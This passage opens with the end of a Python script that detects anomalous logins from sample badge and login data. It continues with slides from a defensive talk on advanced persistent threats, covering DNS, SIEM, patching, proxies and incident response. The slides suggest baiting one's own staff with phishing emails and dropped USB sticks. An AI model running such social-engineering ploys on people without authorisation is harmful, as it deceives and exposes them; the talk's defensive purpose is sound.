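    {"user": "jsmith", "ts": datetime(2011, 10, 5, 8, 10), "kind": "badge_enter"},
    {"user": "jsmith", "ts": datetime(2011, 10, 5, 9, 0), "kind": "login",
     "host": "ad-dc01"},
]
BASELINE_LOGINS = [{"user": "sally", "host": "ad-dc01",
                    "ts": datetime(2011, 10, day, 8, 30 + day)}
                   for day in range(3, 8)]          # 08:33 to 08:37, Mon-Fri
NEW_LOGINS = [
    {"user": "sally", "host": "ad-dc01", "ts": datetime(2011, 10, 4, 8, 33)},   # normal
    {"user": "sally", "host": "dns01",   "ts": datetime(2011, 10, 5, 8, 35)},   # unusual host
    {"user": "sally", "host": "ad-dc01", "ts": datetime(2011, 10, 8, 1, 31)},   # Saturday
    {"user": "sally", "host": "ad-dc01", "ts": datetime(2011, 10, 6, 22, 15)},  # off hours
]

if __name__ == "__main__":
    print(badge_login_conflicts(BADGE_EVENTS))
    print(off_baseline_logins(learn_baseline(BASELINE_LOGINS), NEW_LOGINS))
```

Both checks depend on the two event sources sharing a user identity and a clock, which in practice is the hard part of getting a SIEM to do this: badge systems and Active Directory rarely agree on either without a mapping table and NTP.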
APT IN DEPTH
HOW DO I PROTECT MYSELF?
What do I do?
1. Early warning
2. Protection
3. Remediation
4. Counter measures
Before you can protect yourself…
• You have to understand A/V is not going to answer the following:
– Who is targeting you?
– What are they after?
– Have they succeeded?
– How long have they been succeeding?
– What have I lost so far?
– Who is patient zero?
– How does this spread?
Time to Update Your Inventory…
• Organizations have to start to better understand what
assets they have hanging out on the public Internet
• In many cases, organizations are hit because they
didn’t know about that “box in corner, under
someone’s desk, that has a NAT to the Internet”.
Inspect/Secure DNS
• Watch your DNS logs to see what users are trying to resolve
• Could lead you to understand whether or not users are infected (C&C) or whether they are going to be (phishing links)
• Are you allowing DNS resolution on name servers outside your organization?
• Split DNS, split/split DNS, split/split/split DNS
Architect Your Network for Attack
• Expect that a breach will occur – architect based
on this
• Layer your security controls (router, perimeter firewall, proxy, host FW, host security)
• Although layering is important always remember -- increased emphasis on protecting the data itself.
• Increase the level of monitoring and intrusion detection
• Honeypots can help
• The dreaded “ANY/ANY” (both ingress/egress)
Take Care of Your Web Apps
• Web applications remain the low-hanging fruit
for attackers.
• Yes, penetration testing is important - but
these measures perpetuate a whack-a-mole
security strategy that is neither manageable
nor sustainable
• Make investments in secure code review, securely configured Web server environments, and vigilant monitoring of Web activity.
Take Care of Your Web Apps
• Monitor their logs – incorporate into your
SIEM
• Deploy an application proxy such as mod_proxy
– Screens and blocks common vulnerable requests (i.e. SQL injection, XSS, etc)
– Advanced audit and logging functionality
– Layer of obfuscation – your web app is not directly on the Internet
Geo-blocking….
• Block IP networks based on country location
• Can be ingress and/or egress
• For example, block all traffic from China,
Ukraine, etc.
• Usually done at a perimeter router level
• Not always easy - to block a country you first must have the entire range of IP addresses that were assigned to that country – you could block legitimate traffic!
Watch Network Traffic
• Look at the possibility of a SIEM tool – allow for
aggregation and correlation (there are
commercial and open source flavors of this)
• Normalize your network traffic patterns – What is
normal and what is not (isolate what is not, and
investigate as possible attacks)
• Look at DLP as a potential solution
• Rootkits can hide on a system but network traffic
cannot be hidden
• Understand all traffic patterns and look for
anomalies
– If you have an IDS/IPS make sure it is baselined
Watch Network Traffic
• Monitor cyber security events 24 x 7.
– Advanced persistent threats like those that hit organizations are just that--persistent--and require constant vigilance.
• Across federal government, agencies are investing in "continuous monitoring," with a goal of obtaining a near real-time view into the status of computer system security.
Protect the Endpoint
• Patch your systems – Un-patched Adobe (Acrobat, Flash) and Microsoft (Windows, Office) are big reasons why machines are infected
• Protect the endpoint
– Whitelisting technology? We know what is good, block everything else.
Test Your Systems
• Perform a risk assessment to understand where to focus your protective systems (important as cost may be prohibitive to secure everything)
• Vulnerability management (i.e. scanning system) to continually scan assets for systems that may fall outside of compliance (i.e. configuration, patches, etc)
Proxy your Internet Traffic
• As opposed to direct Internet via a NAT
• Control and logging
• Consider “honeypotting” for internal networks
• You can use whitelisting/blacklisting technologies as well (i.e. Web Sense, 8e6, BlueCoat, etc.)
Response
• Have a proper Incident response process on
how to deal with these issues
• Remove devices from the network
immediately or monitor what the attackers are
doing
• Post event analysis is important as well
Research
• Keep up to date on intelligence reports from trusted security sources on what attacks you need to look out for – many times specific attack vectors can be found (i.e. C&C connects to systems on port TCP/666)
Intelligence Feeds
• Malwaredomainlist.com
• Abuse.ch
• Spamcop.net
• Team-cymru.net
• Shadowserver.org
Education
• Make sure your security team (or group responsible for monitoring) knows what to look for (i.e. education)
• Education – About spear-phishing, malware sites, etc (what should they not click, not plugging unknown USB sticks into their PCs, etc) – get other groups that can be vocal for you to assist (i.e. PR, HR, etc)
• Social engineering is a real threat – ensure your organization is trained on how to deal with this threat
Test your Organization
• Spear-phish a sample of your staff from a
crafted e-mail account
• Include a link to a website, log traffic
• Leave some candy in the lunchroom (i.e.
DVD, USB stick, etc) – think autorun.
• You will be surprised what you find!
Control Systems
• If you are an organization that has sensitive control systems (i.e. power utility)
• Next-generation automation and control systems must be hardened and made resilient against the same kinds of attacks we contend with on the Internet.
• Traditional control system design assumptions and security measures need to be reassessed as embedded devices adopt open, rather than proprietary, standards, and as logical and even physical separation from the Internet become harder to assure
Purge legacy, minority technologies
• The Web server in the first attack was based on a little-used technology at the lab, Adobe ColdFusion.
• Such out-of-sight, out-of-mind technologies are inherently vulnerable because they don't get the same degree of attention as an organization's primary platforms.
On a closing note….
“Maintain a constant state of
Suspicious Alertness!”
Lieutenant Colonel Kazinski, Jarhead (2005)
Thank you!
Questions or Comments?
Peter Morin
902-229-6282
[email protected]
http://www.twitter.com/@petermorin123